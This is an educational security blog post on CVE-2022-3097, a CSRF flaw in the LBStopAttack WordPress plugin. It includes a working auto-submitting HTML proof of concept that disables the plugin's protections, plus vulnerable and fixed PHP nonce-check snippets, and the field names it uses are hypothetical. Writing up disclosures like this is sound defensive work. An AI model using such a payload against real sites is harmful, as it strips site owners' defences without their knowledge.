WordPress plugins bring tons of features to websites, but plugins with weak security can put your whole site at risk. In this post, we’ll look at CVE-2022-3097, a security flaw in the LBStopAttack WordPress plugin (through version 1.1.2) that exposes websites to a type of attack called CSRF (Cross-Site Request Forgery). Using this attack, a bad actor could quietly disable the plugin’s protections — and leave your site wide open.

What Is LBStopAttack?

LbStopAttack is a WordPress plugin meant to shield your site from brute-force and other common attacks. It’s supposed to give you an extra layer of defense, but ironically, a simple mistake in the plugin’s code created a new vulnerability.

The Security Flaw: Missing Nonces

In WordPress, a nonce is a security token that makes sure requests (like saving a plugin’s settings) actually come from a real logged-in user, not from an attacker. If a plugin doesn’t use nonces to check when someone updates its settings, it’s possible for an attacker to trick an admin into changing settings without their knowledge. This is a classic CSRF attack.

LBStopAttack plugin through version 1.1.2 doesn’t use nonces when saving settings. That means, with just a little bit of social engineering, an attacker could sneak in and turn off all the plugin’s protections.

How Does the Attack Work?

Imagine you’re a WordPress site admin and you’re logged into your dashboard. An attacker sends you a link or tricks you into loading a web page they control. That page secretly submits a request to your WordPress site on your behalf — like changing the settings for LBStopAttack to turn it off!

The Exploit in Action

Suppose the plugin handles its settings via a request to /wp-admin/options-general.php?page=LBStopAttack with the necessary POST data. Here’s what a simple HTML attack snippet might look like:

<!DOCTYPE html>
<html>
  <body>
    <!-- This form would be submitted automatically to the target WordPress site -->
    <form action="https://YOUR-SITE.com/wp-admin/options-general.php?page=LBStopAttack"; method="post" id="csrfForm">
      <!-- Malicious settings: disables protections -->
      <input type="hidden" name="ProtectEnable" value="">
      <input type="hidden" name="ProtectLogEnable" value="">
      <input type="hidden" name="ProtectBlockHtaccess" value="">
      <input type="hidden" name="submit" value="Save Settings">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

If a logged-in admin loads this attack page, their browser will submit the request with their authentication cookies — and LBStopAttack will save the new settings, disabling itself. Notice there’s no nonce value required for the settings form.

Let’s say the plugin settings form looks like

<form method="post">
  <input type="checkbox" name="ProtectEnable" value="1" checked>
  <input type="checkbox" name="ProtectLogEnable" value="1" checked>
  <input type="checkbox" name="ProtectBlockHtaccess" value="1" checked>
  <input type="submit" name="submit" value="Save Settings">
</form>

But in the plugin’s code, *no check for check_admin_referer()* or a custom nonce like this is added:

if ( isset($_POST['submit']) ) {
  // Vulnerable! No nonce check!
  // Save the settings
}

A secure plugin would use

if ( isset($_POST['submit']) && check_admin_referer('lbstopattack_save_settings') ) {
  // Safe to save settings
}

Why Does This Matter?

If an attacker disables your security plugin, they can follow up with further attacks—like brute-forcing your login page, defacing your website, or installing malware. You thought your plugin had you covered… but unless you’ve *updated*, you could be exposed.

How Can You Protect Yourself?

1. Update the Plugin: This vulnerability was present in LBStopAttack versions through 1.1.2. Make sure you’re running the latest version from WordPress.org.

Use only reputable plugins: Always check for recent updates and active support.

3. Don’t browse random links when logged in as admin. Logging in as WordPress admin should be for admin work only.
4. Check your plugins for nonce checks. If you develop plugins or themes, always use nonce fields and verify them.

References

- CVE-2022-3097 Details (NVD)
- WPScan Vulnerability Database: LBStopAttack CSRF
- WordPress.org LBStopAttack Plugin

Summary

CVE-2022-3097 is a text-book example of why security basics like nonces matter in WordPress. Even a plugin meant to protect can accidentally make you more vulnerable if it’s poorly coded. Always keep plugins updated, review security announcements, and remember: never trust input, always use nonces.


*Copyright © 2024. This write-up is original content for educational and security awareness purposes. Share to help your friends stay safe!*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 01:51:00 UTC